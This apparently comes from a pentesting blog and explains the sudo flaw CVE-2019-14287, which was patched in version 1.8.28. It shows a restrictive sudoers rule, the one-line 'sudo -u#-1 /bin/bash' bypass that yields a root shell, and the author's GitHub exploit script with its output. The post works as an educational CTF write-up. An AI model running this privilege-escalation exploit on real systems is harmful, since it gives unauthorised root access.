6 July 2022

Pentesting Fun Stuff

following the cyber security path…

Sudo Security Bypass

Sudo Security Bypass

Recently there was a big commotion about sudo or ‘superuser do‘. Apparently there was a flaw in this immense popular program which enables Linux users to create a more granular security structure on their operating system. Sudo gives the system admin the possibility to hand out permission and control which user can use what program and if they can act temporarily as root or NOT.

With the found flaw it is possible for a user to run the program even if the sysadmin had restricted this. To use this flaw it is important to remember that the user in question needs to have some sort of sudo permission. If the user has non sudo permission, there is no sudo to exploit! Also the flaw only exists in the sudo version prior to 1.8.28, because in this version the flaw is patched.

An example:

#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification
test ALL=(ALL,!root) /bin/bash

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

In the sudoers file there is a user (test). For this user it’s restricted to run /bin/bash as root.

test@cyberspace:~$ sudo /bin/bash
[sudo] password for test: 
Sorry, user test is not allowed to execute '/bin/bash' as root on cyberspace.

This is how it normally behaves. The !root restriction in the sudoers file is doing its work.

test@cyberspace:~$ sudo -u#-1 /bin/bash
root@cyberspace:/home/test# id
uid=0(root) gid=1001(test) groups=1001(test)

But with the usage of the flaw, the user test just ran /bin/bash as root, making him: root!

Because I like to do CTF’s, I created a small script that checks if the sudo version is vulnerable and exploits the flaw with the given sudo permission.

test@cyberspace:~$ git clone https://github.com/n0w4n/CVE-2019-14287.git
Cloning into 'CVE-2019-14287'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 22 (delta 7), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (22/22), done.
test@cyberspace:~$ cd CVE-2019-14287/
test@cyberspace:~/CVE-2019-14287$ bash sudo.sh 
[-] This user has sudo rights
[-] Checking sudo version
[-] This sudo version is vulnerable
[-] Trying to exploit
root@cyberspace:/home/test/CVE-2019-14287# id
uid=0(root) gid=1001(test) groups=1001(test)

The script can be found on my github page: https://github.com/n0w4n/CVE-2019-14287

Also…..don’t forget to update your Linux version!!! Happy hacking…

 

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.